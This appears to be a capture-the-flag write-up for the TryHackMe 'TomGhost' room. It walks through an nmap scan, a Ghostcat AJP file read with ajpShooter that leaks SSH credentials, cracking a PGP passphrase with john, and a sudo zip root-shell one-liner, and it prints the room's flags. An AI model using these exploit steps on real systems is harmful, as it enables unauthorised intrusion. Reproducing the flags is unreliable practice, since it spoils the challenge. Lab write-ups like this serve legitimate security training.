# Writeup [TomGhost](https://tryhackme.com/room/tomghost) ###### Lets start with Enumeration >Let's start with nmap scan ***==nmap -sV -Pn -A <ip>==*** ``` PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQvC8xe2qKLoPG3vaJagEW2eW4juBu9nJvn53nRjyw7y/0GEWIxE1KqcPXZiL+RKfkKA7RJNTXN2W9kCG8i6JdVWs2x9wD28UtwYxcyo6M9dQ7i2mXlJpTHtSncOoufSA45eqWT4GY+iEaBekWhnxWM+TrFOMNS5bpmUXrjuBR2JtN9a9cqHQ2zGdSlN+jLYi2Z5C7IVqxYb9yw5RBV5+bX7J4dvHNIs3otGDeGJ8oXVhd+aELUN8/C2p5bVqpGk04KI2gGEyU611v3eOzoP6obem9vsk7Kkgsw7eRNt1+CBrwWldPr8hy6nhA6Oi5qmJgK1x+fCmsfLSH3sz1z4Ln | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOscw5angd6i9vsr7MfCAugRPvtx/aLjNzjAvoFEkwKeO53N01Dn17eJxrbIWEj33sp8nzx1Lillg/XM+Lk69CQ= | 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqgzoXzgz5QIhEWm3+Mysrwk89YW2cd2Nmad+PrE4jw 53/tcp open tcpwrapped syn-ack 8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http syn-ack Apache Tomcat 9.0.30 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.30 ``` >We find service tcpwrapped so we can bypass it with -sT in nmap scan. ``` nmap -sT -p 53 10.10.61.98 Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-24 22:20 IST Nmap scan report for 10.10.61.98 Host is up (0.37s latency). PORT STATE SERVICE 53/tcp open domain ``` >Second susupicious thing we got is `ajp13` running on port 8009 ### [Ajp13](https://apkash8.medium.com/hunting-and-exploiting-apache-ghostcat-b7446ef83e74) >After running ajpshooter ***==python3 ajpShooter.py http://<ip>:8080/ 8009 /WEB-INF read==*** ``` 1.98:8080/ 8009 /WEB-INF/web.xml read _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test [<] 200 200 [<] Accept-Ranges: bytes [<] ETag: W/"1261-1583902632000" [<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT [<] Content-Type: application/xml [<] Content-Length: 1261 <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks </description> </web-app> ``` >Here we get the username and password of shh maybe so let's try it ![](https://i.imgur.com/Ds5RtRX.png) ssh successful!! ### Privilage escalation >Looking in our current directory, it appears that we have an encrypted [**PGP**](https://superuser.com/questions/46461/decrypt-pgp-file-using-asc-key) (pretty good privacy) file `(credential.pgp)`, along with some ASCII KEY `(tryhackme.asc)`. So now import ASCII key ***==gpg --import tryhackme.asc==*** ![](https://i.imgur.com/orWYq4S.png) Now lets decrypt the pgp file ***==gpg --decrypt credential.pgp==*** ![](https://i.imgur.com/I6XB8d0.png) So we need Passphrase so we can get it by ASCII key using `john` ***==gpg2john tryhackme.asc > hash==*** ***==john hash --wordlist=/usr/share/wordlist/rockyou.txt==*** >here we get the passphrase so ***==`alexandru`==*** ``` skyfuck@ubuntu:~$ gpg --decrypt credential.pgp --output credential.txt skyfuck@ubuntu:~$ cat credential.txt merlin:################## ``` >So we have to switch user to merlin ``` skyfuck@ubuntu:~$ su merlin Password: skyfuck@ubuntu:~$ cat user.txt THM{GhostCat_1s_so_cr4sy} merlin@ubuntu:~$ sudo -l Matching Defaults entries for merlin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip ``` >Here we get `user.txt`and the flag ***==THM{GhostCat_1s_so_cr4sy}==*** >So lets check [GTFOBINS](https://gtfobins.github.io/gtfobins/zip/#sudo) to get shell ``` TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #' ``` ![](https://i.imgur.com/hFywNLr.png) #### So we become the root ***==cat /root/root.txt==*** > ***THM{Z1P_1S_FAKE}***